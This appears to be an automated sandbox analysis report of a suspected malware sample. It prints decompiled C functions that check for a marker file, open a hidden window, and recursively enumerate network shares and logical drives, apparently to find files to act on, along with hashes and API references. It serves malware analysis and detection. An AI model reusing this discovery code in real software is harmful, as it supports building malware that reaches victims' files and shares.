String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C500(void* __ecx, void* __edx) {
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t10;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t27;

				_t21 = __edx;
				_t4 =  &_v264;
				_t19 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t27 = E004220B6( &_v264, "r");
					__eflags = _t27;
					if(__eflags != 0) {
						_push(_t22);
						_push(2);
						_push(0);
						_push(_t27);
						E0042387F(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t23 = _t10;
						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
						__eflags = _t23;
						if(__eflags == 0) {
							L7:
							_push(_t27);
							E00423A38(_t19, _t23, _t27, __eflags);
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t23 - 0x400;
							if(__eflags > 0) {
								goto L7;
							} else {
								E004222F5(_t19, 1, _t23, _t27);
								_push(_t27);
								E00423A38(_t19, _t23, _t27, __eflags);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c500
0x0040c509
0x0040c519
0x0040c51b
0x0040c523
0x0040c539
0x0040c550
0x0040c555
0x0040c557
0x0040c561
0x0040c562
0x0040c564
0x0040c566
0x0040c567
0x0040c56c
0x0040c56d
0x0040c572
0x0040c573
0x0040c575
0x0040c57d
0x0040c57f
0x0040c5a5
0x0040c5a5
0x0040c5a6
0x0040c5ae
0x0040c5b6
0x0040c581
0x0040c581
0x0040c587
0x00000000
0x0040c589
0x0040c58e
0x0040c593
0x0040c594
0x0040c5a4
0x0040c5a4
0x0040c587
0x0040c559
0x0040c55a
0x0040c560
0x0040c560
0x0040c525
0x0040c52b
0x0040c52b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA80(struct HINSTANCE__* __ecx) {
				struct HWND__* _t1;
				struct HWND__* _t6;

				 *0x513244 = __ecx;
				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0);
				_t6 = _t1;
				if(_t6 != 0) {
					ShowWindow(_t6, 0);
					UpdateWindow(_t6);
					 *0x51323c = _t6;
					return 1;
				} else {
					return _t1;
				}
			}

0x0041baa7
0x0041baad
0x0041bab3
0x0041bab7
0x0041babe
0x0041bac5
0x0041bacb
0x0041bad7
0x0041baba
0x0041baba
0x0041baba

APIs

CreateWindowExW.USER32 ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234
sharememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
				char _v8;
				signed int _v16;
				intOrPtr _v24;
				signed int _v28;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v92;
				intOrPtr _v96;
				int _v100;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				void* _v144;
				struct _NETRESOURCE* _v148;
				signed int _v152;
				void* _v156;
				int _v160;
				int _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t103;
				void* _t107;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				void* _t122;
				signed int _t124;
				signed int _t127;
				struct _NETRESOURCE* _t129;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t161;
				intOrPtr* _t164;
				signed int _t167;
				signed int _t168;
				void* _t169;

				_t129 = __ecx;
				_t168 = _t167 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cabd6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				_t169 = _t168 - 0x98;
				_v164 = 0x4000;
				_t164 = __edx;
				_v160 = 0xffffffff;
				if(WNetOpenEnumW(2, 0, 0, __ecx,  &_v156) == 0) {
					_t122 = GlobalAlloc(0x40, _v164);
					_v144 = _t122;
					while(1) {
						E0042B420(_t122, 0, _v164);
						_t169 = _t169 + 0xc;
						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164);
						__eflags = _t88;
						if(_t88 != 0) {
							break;
						}
						_v148 = _t88;
						__eflags = _v160 - _t88;
						if(_v160 > _t88) {
							_t124 = _t122 + 0x10;
							__eflags = _t124;
							_v152 = _t124;
							do {
								_v96 = 7;
								_v100 = 0;
								_v116 = 0;
								_v72 = 7;
								_v76 = 0;
								_v92 = 0;
								_v48 = 7;
								_v52 = 0;
								_v68 = 0;
								_v24 = 7;
								_v28 = 0;
								_v44 = 0;
								_v8 = 0;
								_t151 =  *_t124;
								_v132 =  *((intOrPtr*)(_t124 - 0x10));
								_v128 =  *((intOrPtr*)(_t124 - 0xc));
								_v124 =  *((intOrPtr*)(_t124 - 8));
								_v120 =  *(_t124 - 4);
								__eflags = _t151;
								if(_t151 != 0) {
									__eflags =  *_t151;
									if( *_t151 != 0) {
										_t146 = _t151;
										_t161 = _t146 + 2;
										do {
											_t118 =  *_t146;
											_t146 = _t146 + 2;
											__eflags = _t118;
										} while (_t118 != 0);
										_t147 = _t146 - _t161;
										__eflags = _t147;
										_t148 = _t147 >> 1;
									} else {
										_t148 = 0;
									}
									_push(_t148);
									_t129 =  &_v116;
									E00415C10(_t124, _t129, _t161, _t164, _t151);
								}
								_t152 =  *(_t124 + 4);
								__eflags = _t152;
								if(_t152 != 0) {
									__eflags =  *_t152;
									if( *_t152 != 0) {
										_t143 = _t152;
										_t38 = _t143 + 2; // 0x72
										_t161 = _t38;
										do {
											_t116 =  *_t143;
											_t143 = _t143 + 2;
											__eflags = _t116;
										} while (_t116 != 0);
										_t144 = _t143 - _t161;
										__eflags = _t144;
										_t145 = _t144 >> 1;
									} else {
										_t145 = 0;
									}
									_push(_t145);
									_t129 =  &_v92;
									E00415C10(_t124, _t129, _t161, _t164, _t152);
								}
								_t153 =  *(_t124 + 8);
								__eflags = _t153;
								if(_t153 != 0) {
									__eflags =  *_t153;
									if( *_t153 != 0) {
										_t140 = _t153;
										_t161 = _t140 + 2;
										do {
											_t114 =  *_t140;
											_t140 = _t140 + 2;
											__eflags = _t114;
										} while (_t114 != 0);
										_t141 = _t140 - _t161;
										__eflags = _t141;
										_t142 = _t141 >> 1;
									} else {
										_t142 = 0;
									}
									_push(_t142);
									_t129 =  &_v68;
									E00415C10(_t124, _t129, _t161, _t164, _t153);
								}
								_t154 =  *(_t124 + 0xc);
								__eflags = _t154;
								if(_t154 != 0) {
									__eflags =  *_t154;
									if( *_t154 != 0) {
										_t110 = _t154;
										_t161 = _t110 + 2;
										do {
											_t139 =  *_t110;
											_t110 = _t110 + 2;
											__eflags = _t139;
										} while (_t139 != 0);
										_t111 = _t110 - _t161;
										__eflags = _t111;
										_t112 = _t111 >> 1;
									} else {
										_t112 = 0;
									}
									_push(_t112);
									_t129 =  &_v44;
									E00415C10(_t124, _t129, _t161, _t164, _t154);
								}
								_t161 =  *(_t164 + 4);
								__eflags =  &_v132 - _t161;
								if( &_v132 >= _t161) {
									L41:
									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
										_push(_t129);
										E004150C0(_t124, _t164, _t161, _t164);
									}
									_t131 =  *(_t164 + 4);
									_v140 = _t131;
									_v136 = _t131;
									_v8 = 2;
									__eflags = _t131;
									if(__eflags != 0) {
										E00418FD0(_t131, __eflags,  &_v132);
									}
								} else {
									_t103 =  *_t164;
									_t129 =  &_v132;
									__eflags = _t103 - _t129;
									if(_t103 > _t129) {
										goto L41;
									} else {
										_t135 = _t129 - _t103;
										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
											_push(_t135);
											E004150C0(_t127, _t164, _t161, _t164);
										}
										_t136 =  *(_t164 + 4);
										_v136 = _t136;
										_v140 = _t136;
										_t107 = _t127 * 0x70 +  *_t164;
										_v8 = 1;
										__eflags = _t136;
										if(__eflags != 0) {
											E00418FD0(_t136, __eflags, _t107);
										}
										_t124 = _v152;
									}
								}
								_v8 = 0;
								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
								__eflags =  *(_t124 - 4) & 0x00000002;
								if(( *(_t124 - 4) & 0x00000002) != 0) {
									_t71 = _t124 - 0x10; // -16
									E00410BD0(_t71, _t164);
								}
								_v8 = 0xffffffff;
								E00410F20( &_v132);
								_t124 = _t124 + 0x20;
								_t129 = _v148 + 1;
								_v152 = _t124;
								_v148 = _t129;
								__eflags = _t129 - _v160;
							} while (_t129 < _v160);
							_t122 = _v144;
						}
					}
					_t89 = WNetCloseEnum(_v156);
					asm("sbb eax, eax");
					 *[fs:0x0] = _v16;
					_t91 =  ~_t89 + 1;
					__eflags = _t91;
					return _t91;
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
			}

0x00410bd0
0x00410bd3
0x00410bd6
0x00410bd8
0x00410be3
0x00410be4
0x00410beb
0x00410bf8
0x00410c08
0x00410c0a
0x00410c1a
0x00410c3f
0x00410c41
0x00410c45
0x00410c4c
0x00410c51
0x00410c63
0x00410c69
0x00410c6b
0x00000000
0x00000000
0x00410c71
0x00410c75
0x00410c79
0x00410c7b
0x00410c7b
0x00410c7e
0x00410c82
0x00410c84
0x00410c8c
0x00410c94
0x00410c99
0x00410ca1
0x00410ca5
0x00410caa
0x00410cb5
0x00410cbc
0x00410cc1
0x00410ccc
0x00410cd3
0x00410cdb
0x00410ce5
0x00410ce7
0x00410cee
0x00410cf5
0x00410cfc
0x00410d00
0x00410d02
0x00410d04
0x00410d08
0x00410d0e
0x00410d10
0x00410d13
0x00410d13
0x00410d16
0x00410d19
0x00410d19
0x00410d1e
0x00410d1e
0x00410d20
0x00410d0a
0x00410d0a
0x00410d0a
0x00410d22
0x00410d24
0x00410d28
0x00410d28
0x00410d2d
0x00410d30
0x00410d32
0x00410d34
0x00410d38
0x00410d3e
0x00410d40
0x00410d40
0x00410d43
0x00410d43
0x00410d46
0x00410d49
0x00410d49
0x00410d4e
0x00410d4e
0x00410d50
0x00410d3a
0x00410d3a
0x00410d3a
0x00410d52
0x00410d54
0x00410d58
0x00410d58
0x00410d5d
0x00410d60
0x00410d62
0x00410d64
0x00410d68
0x00410d6e
0x00410d70
0x00410d73
0x00410d73
0x00410d76
0x00410d79
0x00410d79
0x00410d7e
0x00410d7e
0x00410d80
0x00410d6a
0x00410d6a
0x00410d6a
0x00410d82
0x00410d84
0x00410d88
0x00410d88
0x00410d8d
0x00410d90
0x00410d92
0x00410d94
0x00410d98
0x00410d9e
0x00410da0
0x00410da3
0x00410da3
0x00410da6
0x00410da9
0x00410da9
0x00410dae
0x00410dae
0x00410db0
0x00410d9a
0x00410d9a
0x00410d9a
0x00410db2
0x00410db4
0x00410dbb
0x00410dbb
0x00410dc0
0x00410dc7
0x00410dc9
0x00410e1f
0x00410e1f
0x00410e22
0x00410e24
0x00410e27
0x00410e27
0x00410e2c
0x00410e2f
0x00410e33
0x00410e37
0x00410e3f
0x00410e41
0x00410e48
0x00410e48
0x00410dcb
0x00410dcb
0x00410dcd
0x00410dd1
0x00410dd3
0x00000000
0x00410dd5
0x00410dd5
0x00410de8
0x00410dea
0x00410ded
0x00410def
0x00410df2
0x00410df2
0x00410df7
0x00410dfd
0x00410e01
0x00410e05
0x00410e07
0x00410e0f
0x00410e11
0x00410e14
0x00410e14
0x00410e19
0x00410e19
0x00410dd3
0x00410e4d
0x00410e55
0x00410e59
0x00410e60
0x00410e64
0x00410e67
0x00410e67
0x00410e70
0x00410e7b
0x00410e84
0x00410e87
0x00410e88
0x00410e8c
0x00410e90
0x00410e90
0x00410e9a
0x00410e9a
0x00410c79
0x00410ea7
0x00410eb7
0x00410eb9
0x00410ec1
0x00410ec1
0x00410ec6
0x00410c1c
0x00410c25
0x00410c32
0x00410c32

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00410A50(char __ecx) {
				signed int _v16;
				char _v28;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v76;
				unsigned int _v80;
				char _v84;
				unsigned int _v88;
				char _v89;
				intOrPtr _v96;
				intOrPtr _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t35;
				int _t39;
				int _t40;
				int _t45;
				void* _t48;
				signed int _t52;
				char* _t63;
				signed int _t74;
				signed int _t75;
				void* _t76;
				char* _t77;

				_t75 = _t74 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cab90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				_t76 = _t75 - 0x48;
				_push(_t72);
				_push(_t70);
				_v76 = __ecx;
				_t35 = GetLogicalDrives();
				_v80 = _t35;
				_t52 = 0;
				do {
					if((_t35 >> _t52 & 0x00000001) == 0) {
						goto L11;
					}
					_push(1);
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					E004156D0(_t52,  &_v68, _t70, " ");
					_v16 = 0;
					_t10 = _t52 + 0x41; // 0x41
					_push(2);
					_t59 =  >=  ? _v76 :  &_v76;
					 *( >=  ? _v76 :  &_v76) = _t10;
					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
					_t39 = SetErrorMode(1);
					_t70 = _t39;
					_t62 =  >=  ? _v84 :  &_v84;
					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84);
					_t72 = _t40;
					SetErrorMode(_t39);
					if(_t40 != 0) {
						_t44 =  >=  ? _v76 :  &_v76;
						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76);
						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
							_t77 = _t76 - 0x18;
							_v89 = 0;
							_t63 = _t77;
							_push(0xffffffff);
							_push(0);
							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t63 + 0x10)) = 0;
							 *_t63 = 0;
							E00413FF0(_t52, _t63,  &_v76);
							_t48 = E00412900( &_v64, _v101);
							_t76 = _t77 + 0x18;
							_v28 = 1;
							E00413580(_t52, _v96, _t48);
							if(_v48 >= 8) {
								L00422587(_v60);
								_t76 = _t76 + 4;
							}
						}
					}
					_v16 = 0xffffffff;
					if(_v56 >= 0x10) {
						L00422587(_v76);
						_t76 = _t76 + 4;
					}
					_t35 = _v88;
					L11:
					_t52 = _t52 + 1;
				} while (_t52 < 0x1a);
				 *[fs:0x0] = _v16;
				return _t35;
			}

0x00410a53
0x00410a56
0x00410a58
0x00410a63
0x00410a64
0x00410a6b
0x00410a6f
0x00410a70
0x00410a71
0x00410a75
0x00410a7b
0x00410a7f
0x00410a81
0x00410a8a
0x00000000
0x00000000
0x00410a90
0x00410a9b
0x00410aa3
0x00410aab
0x00410ab0
0x00410ab5
0x00410ac6
0x00410ac9
0x00410acb
0x00410ad5
0x00410adb
0x00410ae2
0x00410af1
0x00410af3
0x00410af9
0x00410b00
0x00410b02
0x00410b0a
0x00410b15
0x00410b1b
0x00410b24
0x00410b30
0x00410b33
0x00410b38
0x00410b3e
0x00410b40
0x00410b42
0x00410b49
0x00410b51
0x00410b54
0x00410b61
0x00410b66
0x00410b6e
0x00410b73
0x00410b7d
0x00410b83
0x00410b88
0x00410b88
0x00410b7d
0x00410b24
0x00410b8b
0x00410b98
0x00410b9e
0x00410ba3
0x00410ba3
0x00410ba6
0x00410baa
0x00410baa
0x00410bab
0x00410bba
0x00410bc5

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 166d65d1af3030a4a1b253165fc9c2e46c2d44d30703875f0418fa266df650ed
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 166d65d1af3030a4a1b253165fc9c2e46c2d44d30703875f0418fa266df650ed
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x510ab0 - _t7;
								if(__eflags == 0) {
									_t9 = E00425208(__eflags);
									 *_t9 = E00425261(GetLastError());
									goto L17;
								} else {
									__eflags = E0042793D(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00425208(__eflags);
										 *_t12 = E00425261(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0042793D(_t6, _t31);
						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
						goto L12;
					} else {
						E00420BED(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00420C62(__ebx, __edx, __edi, _a8);
				}
			}

0x0043b706
0x0043b714
0x0043b717
0x0043b719
0x0043b728
0x0043b75b
0x0043b75b
0x0043b75e
0x00000000
0x00000000
0x0043b72b
0x0043b72d
0x0043b72f
0x0043b72f
0x0043b72f
0x0043b73c
0x0043b742
0x0043b744
0x0043b746
0x0043b7a6
0x0043b7a6
0x0043b748
0x0043b748
0x0043b74e
0x0043b790
0x0043b7a4
0x00000000
0x0043b750
0x0043b757
0x0043b759
0x0043b778
0x0043b78c
0x0043b772
0x0043b772
0x0043b772
0x00000000
0x00000000
0x00000000
0x0043b759
0x0043b74e
0x00000000
0x0043b774
0x0043b761
0x0043b76c
0x00000000
0x0043b71b
0x0043b71e
0x0043b724
0x0043b724
0x0043b775
0x0043b777
0x0043b708
0x0043b712
0x0043b712

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F070() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513260, 0xa);
				} while (_t7 == 0x102);
				 *0x513260 = 0;
				 *0x51325c = 0;
				return _t7;
			}

0x0041f085
0x0041f0a0
0x0041f0b0
0x0041f0b6
0x0041f0c6
0x0041f0d2
0x0041f0d4
0x0041f0dd
0x0041f0e7
0x0041f0f5

APIs

PostThreadMessageW.USER32 ref: 0041F085
PeekMessageW.USER32 ref: 0041F0AC
DispatchMessageW.USER32 ref: 0041F0B6
PeekMessageW.USER32 ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E500() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x513258, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513254, 0xa);
				} while (_t7 == 0x102);
				 *0x513254 = 0;
				 *0x513258 = 0;
				return _t7;
			}

0x0041e515
0x0041e530
0x0041e540
0x0041e546
0x0041e556
0x0041e562
0x0041e564
0x0041e56d
0x0041e577
0x0041e585

APIs

PostThreadMessageW.USER32 ref: 0041E515
PeekMessageW.USER32 ref: 0041E53C
DispatchMessageW.USER32 ref: 0041E546
PeekMessageW.USER32 ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

